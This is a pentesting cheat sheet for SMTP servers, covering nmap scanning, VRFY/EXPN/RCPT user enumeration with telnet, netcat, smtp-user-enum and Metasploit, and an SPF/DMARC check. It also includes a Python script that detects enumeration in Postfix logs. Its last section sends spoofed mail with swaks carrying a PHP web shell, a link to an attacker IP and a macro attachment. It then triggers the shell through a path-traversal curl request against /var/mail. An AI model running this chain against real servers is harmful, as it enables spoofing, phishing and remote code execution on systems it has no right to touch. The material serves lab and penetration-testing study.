25 - Pentesting SMTP

SMTP stands for "Simple Mail Transfer Protocol". It is a protocol used for sending email messages between servers. Most email systems that send mail over the Internet use SMTP to send messages from one server to another, and to deliver messages to local mail clients like Microsoft Outlook or Apple Mail. SMTP servers listen for incoming mail, and then use other protocols to deliver the message to the recipient's mailbox.

nmap

nmap -p 25 -sV -sC -Pn -vv $IP

telnet - (user enumeration)

telnet $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

netcat - (user enumeration)

netcat $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

smtp-user-enum - (user enumeration)

sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP

metasploit - (user enumeration)

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run
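The defender-side counterpart to the VRFY/EXPN/RCPT enumeration above, added here as an example and not part of the original cheat sheet: when VRFY is disabled, probing shows up in the MTA log as a burst of "User unknown" RCPT rejections from one client, and this script flags clients that hit many distinct unknown recipients inside a short window. The Postfix-style log lines, IP addresses and threshold are constructed sample values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Postfix smtpd-style lines (sample data, not from a real server):
# 203.0.113.7 probes six mailboxes in 40 seconds, 198.51.100.20 is one typo.
SAMPLE_LOG = """\
Mar 13 10:00:01 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <root@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.net> to=<root@example.com> proto=ESMTP helo=<x>
Mar 13 10:00:05 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <admin@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.net> to=<admin@example.com> proto=ESMTP helo=<x>
Mar 13 10:00:09 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <msfadmin@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.net> to=<msfadmin@example.com> proto=ESMTP helo=<x>
Mar 13 10:00:14 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <szalek@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.net> to=<szalek@example.com> proto=ESMTP helo=<x>
Mar 13 10:00:20 mx postfix/smtpd[2102]: 1A2B3C: client=mail.partner.example[198.51.100.20]
Mar 13 10:00:25 mx postfix/smtpd[2103]: NOQUEUE: reject: RCPT from mail.partner.example[198.51.100.20]: 550 5.1.1 <jhon@example.com>: Recipient address rejected: User unknown in local recipient table; from=<b@partner.example> to=<jhon@example.com> proto=ESMTP helo=<mail.partner.example>
Mar 13 10:00:31 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <test@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.net> to=<test@example.com> proto=ESMTP helo=<x>
Mar 13 10:00:40 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <guest@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.net> to=<guest@example.com> proto=ESMTP helo=<x>
"""

# Pull out the three fields needed: syslog timestamp, client IP, rejected recipient.
REJECT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) .*?RCPT from \S+\[(?P<ip>[^\]]+)\]: "
    r"550 .*?User unknown.*? to=<(?P<rcpt>[^>]+)>"
)

def parse_rejections(log_text, year=2024):
    """Yield (timestamp, client_ip, recipient) for every 'User unknown' rejection.
    Syslog lines carry no year, so one is supplied for datetime arithmetic."""
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["rcpt"].lower()

def detect_enumeration(log_text, threshold=5, window_seconds=60):
    """Return {client_ip: peak number of distinct unknown recipients seen inside
    any window_seconds span} for clients reaching threshold; one typo never trips it."""
    by_ip = defaultdict(list)
    for ts, ip, rcpt in parse_rejections(log_text):
        by_ip[ip].append((ts, rcpt))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        peak = 0
        for i, (start, _) in enumerate(events):   # window anchored at each event
            in_window = {r for t, r in events[i:] if (t - start).total_seconds() <= window_seconds}
            peak = max(peak, len(in_window))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

if __name__ == "__main__":
    for ip, count in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible recipient enumeration from {ip}: {count} unknown users within 60s")
```

Counting distinct recipients rather than raw rejections keeps a legitimate sender retrying one mistyped address out of the alert; set disable_vrfy_command = yes in Postfix so that VRFY probing also lands in this RCPT path.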

validate SMTP configuration (SPF/DMARC records) - spoofcheck

./spoofcheck.py michalszalkowski.com

send email / execute command

send email (PHP code in the body)

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $IP

send email (link in the body)

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <a href="http://192.168.45.206">click me</a> BodyEnd' --server $IP

send email (with attachment)

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach mymacro.doc --server $IP

execute

curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'